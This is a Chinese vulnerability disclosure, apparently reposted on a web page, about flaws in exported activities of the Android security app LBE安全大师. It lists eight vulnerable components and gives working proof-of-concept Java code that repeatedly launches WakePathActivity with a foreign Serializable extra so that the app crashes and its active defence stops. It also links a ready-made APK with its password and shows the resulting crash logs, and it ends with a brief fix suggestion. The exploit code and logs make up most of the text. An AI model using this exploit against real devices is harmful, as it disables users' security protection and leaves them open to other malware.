无视主动防御利用多处缺陷使得LBE安全崩溃退出

LBE安全大师存在多处缺陷可被恶意应用终止防护

作为一款安全应用自身安全性还是很重要的,经测试,LBE安卓最新版存在多处本地服务,在开启主动防御的情况可使得LBE安全大师无限崩溃;(测试时看到LBE有多个进程,在崩溃后一段时间会自动重启,但其实只要写个循环就行了,崩溃比重启快多了~~)

因为是漏洞,所以根本不需要关注啥主动防御,存在问题的组件有:

com.lbe.security.ui.phone2.PhoneMainActivity

com.lbe.security.ui.notificationmanager.NotificationManagerActivity

com.lbe.security.ui.tips.TipsWebActivity

com.lbe.security.ui.privacy.HipsMainActivity

com.lbe.security.ui.home.NewHomeActivity

com.lbe.security.ui.market.category.CategoryDetailsListActivity

com.lbe.security.ui.upgrade.UpdateManagerActivity

com.lbe.security.ui.optimize.WakePathActivity

利用代码:MainActivity.java

package com.example.myapp; import android.app.Activity; import android.os.Bundle; import android.content.Intent; import android.content.ComponentName; import java.io.Serializable; public class MyActivity extends Activity { /** * Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); int n=20; while (n>0){ Intent intent = new Intent(); intent.setComponent(new ComponentName("com.lbe.security", "com.lbe.security.ui.optimize.WakePathActivity")); intent.putExtra("this_is_a_random_serializable_extra_for_test_general_reject_server", new SerializableObject()); startActivity(intent); n--; } } static class SerializableObject implements Serializable { static final long serialVersionUID = 42L; SerializableObject() { super(); } } }

提供一个验证用的APK,安装后打开,LBE自动崩溃多次:

链接: http://pan.baidu.com/s/1bHVeI 密码: gam5

相关crash的logcat:

java.lang.RuntimeException: Unable to start activity ComponentInfo{com.lbe.security/com.lbe.security.ui.op timize.WakePathActivity}: java.lang.RuntimeException: Parcelable encounteredClassNotFoundException reading a Serializable object (name = com.example.myapp.MyAc tivity$SerializableObject) W at android.app.ActivityThread.performLaunchActivi ty(ActivityThread.java:2371) W at android.app.ActivityThread.handleLaunchActivit y(ActivityThread.java:2423) W at android.app.ActivityThread.access$800(Activity Thread.java:155) W at android.app.ActivityThread$H.handleMessage(Act ivityThread.java:1340) W at android.os.Handler.dispatchMessage(Handler.jav a:110) W at android.os.Looper.loop(Looper.java:193) W at android.app.ActivityThread.main(ActivityThread .java:5332) W at java.lang.reflect.Method.invokeNative(Native M ethod) W at java.lang.reflect.Method.invoke(Method.java:51 5) W at com.android.internal.os.ZygoteInit$MethodAndAr gsCaller.run(ZygoteInit.java:829) W at com.android.internal.os.ZygoteInit.main(Zygote Init.java:645) W at dalvik.system.NativeStart.main(Native Method) W Caused by: java.lang.RuntimeException: Parcelable enc ounteredClassNotFoundException reading a Serializable object (name = com.example.myapp.MyActivity$Serializ ableObject) W at android.os.Parcel.readSerializable(Parcel.java :2219) W at android.os.Parcel.readValue(Parcel.java:2064) W at android.os.Parcel.readArrayMapInternal(Parcel. java:2314) W at android.os.Bundle.unparcel(Bundle.java:249) W at android.os.Bundle.getString(Bundle.java:1118) W at android.content.Intent.getStringExtra(Intent.j ava:4961) W at com.lbe.security.ui.optimize.WakePathActivity. onCreate(WakePathActivity.java:86) W at android.app.Activity.performCreate(Activity.ja va:5371) W at android.app.Instrumentation.callActivityOnCrea te(Instrumentation.java:1106) W at com.lbe.client.zz.ba.callActivityOnCreate(Inst rumentationDelegate.java:76) W at android.app.ActivityThread.performLaunchActivi ty(ActivityThread.java:2335) W ... 11 more W Caused by: java.lang.ClassNotFoundException: com.exam ple.myapp.MyActivity$SerializableObject W at java.lang.Class.classForName(Native Method) W at java.lang.Class.forName(Class.java:251) W at java.io.ObjectInputStream.resolveClass(ObjectI nputStream.java:2266) W at java.io.ObjectInputStream.readNewClassDesc(Obj ectInputStream.java:1644) W at java.io.ObjectInputStream.readClassDesc(Object InputStream.java:658) W at java.io.ObjectInputStream.readNewObject(Object InputStream.java:1785) W at java.io.ObjectInputStream.readNonPrimitiveCont ent(ObjectInputStream.java:762) W at java.io.ObjectInputStream.readObject(ObjectInp utStream.java:1986) W at java.io.ObjectInputStream.readObject(ObjectInp utStream.java:1943) W at android.os.Parcel.readSerializable(Parcel.java :2213) W ... 21 more W Caused by: java.lang.NoClassDefFoundError: com/exampl e/myapp/MyActivity$SerializableObject W ... 31 more W Caused by: java.lang.ClassNotFoundException: Didn't f ind class "com.example.myapp.MyActivity$SerializableO bject" on path: DexPathList[[zip file "/data/app/com. lbe.security-1.apk"],nativeLibraryDirectories=[/data/ app-lib/com.lbe.security-1, /vendor/lib, /system/lib] ] W at dalvik.system.BaseDexClassLoader.findClass(Bas eDexClassLoader.java:56) W at java.lang.ClassLoader.loadClass(ClassLoader.ja va:497) W at java.lang.ClassLoader.loadClass(ClassLoader.ja va:457) W ... 31 more dalvikvm W threadid=1: calling UncaughtExceptionHandler I +++ calling Ljava/lang/ThreadGroup;.uncaughtException AndroidRuntime E FATAL EXCEPTION: main E Process: com.lbe.security, PID: 7455 E java.lang.RuntimeException: Unable to start activity ComponentInfo{com.lbe.security/com.lbe.security.ui.op timize.WakePathActivity}: java.lang.RuntimeException: Parcelable encounteredClassNotFoundException reading a Serializable object (name = com.example.myapp.MyAc tivity$SerializableObject) E at android.app.ActivityThread.performLaunchActivi ty(ActivityThread.java:2371) E at android.app.ActivityThread.handleLaunchActivit y(ActivityThread.java:2423) E at android.app.ActivityThread.access$800(Activity Thread.java:155) E at android.app.ActivityThread$H.handleMessage(Act ivityThread.java:1340) E at android.os.Handler.dispatchMessage(Handler.jav a:110) E at android.os.Looper.loop(Looper.java:193) E at android.app.ActivityThread.main(ActivityThread .java:5332) E at java.lang.reflect.Method.invokeNative(Native M ethod) E at java.lang.reflect.Method.invoke(Method.java:51 5) E at com.android.internal.os.ZygoteInit$MethodAndAr gsCaller.run(ZygoteInit.java:829) E at com.android.internal.os.ZygoteInit.main(Zygote Init.java:645) E at dalvik.system.NativeStart.main(Native Method) E Caused by: java.lang.RuntimeException: Parcelable enc ounteredClassNotFoundException reading a Serializable object (name = com.example.myapp.MyActivity$Serializ ableObject) E at android.os.Parcel.readSerializable(Parcel.java :2219) E at android.os.Parcel.readValue(Parcel.java:2064) E at android.os.Parcel.readArrayMapInternal(Parcel. java:2314) E at android.os.Bundle.unparcel(Bundle.java:249) E at android.os.Bundle.getString(Bundle.java:1118) E at android.content.Intent.getStringExtra(Intent.j ava:4961) E at com.lbe.security.ui.optimize.WakePathActivity. onCreate(WakePathActivity.java:86) E at android.app.Activity.performCreate(Activity.ja va:5371) E at android.app.Instrumentation.callActivityOnCrea te(Instrumentation.java:1106) E at com.lbe.client.zz.ba.callActivityOnCreate(Inst rumentationDelegate.java:76) E at android.app.ActivityThread.performLaunchActivi ty(ActivityThread.java:2335) E ... 11 more E Caused by: java.lang.ClassNotFoundException: com.exam ple.myapp.MyActivity$SerializableObject E at java.lang.Class.classForName(Native Method) E at java.lang.Class.forName(Class.java:251) E at java.io.ObjectInputStream.resolveClass(ObjectI nputStream.java:2266) E at java.io.ObjectInputStream.readNewClassDesc(Obj ectInputStream.java:1644) E at java.io.ObjectInputStream.readClassDesc(Object InputStream.java:658) E at java.io.ObjectInputStream.readNewObject(Object InputStream.java:1785) E at java.io.ObjectInputStream.readNonPrimitiveCont ent(ObjectInputStream.java:762) E at java.io.ObjectInputStream.readObject(ObjectInp utStream.java:1986) E at java.io.ObjectInputStream.readObject(ObjectInp utStream.java:1943) E at android.os.Parcel.readSerializable(Parcel.java :2213) E ... 21 more E Caused by: java.lang.NoClassDefFoundError: com/exampl e/myapp/MyActivity$SerializableObject E ... 31 more E Caused by: java.lang.ClassNotFoundException: Didn't f ind class "com.example.myapp.MyActivity$SerializableO bject" on path: DexPathList[[zip file "/data/app/com. lbe.security-1.apk"],nativeLibraryDirectories=[/data/ app-lib/com.lbe.security-1, /vendor/lib, /system/lib] ] E at dalvik.system.BaseDexClassLoader.findClass(Bas eDexClassLoader.java:56) E at java.lang.ClassLoader.loadClass(ClassLoader.ja va:497) E at java.lang.ClassLoader.loadClass(ClassLoader.ja va:457) E ... 31 more dalvikvm D threadid=10: exiting D threadid=10: bye! Process I Sending signal. PID: 7455 SIG: 9 Process 7455 ended

无视主动防御利用多处缺陷使得LBE安全崩溃退出

无视主动防御利用多处缺陷使得LBE安全崩溃退出

解决方案:

严格校验接受数据的输入,如空指针,畸形数据,强制数据类型转换等异常情况的判断。

分类:默认分类 时间:2015-03-12 人气:2
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.059 (s). 10 q(s)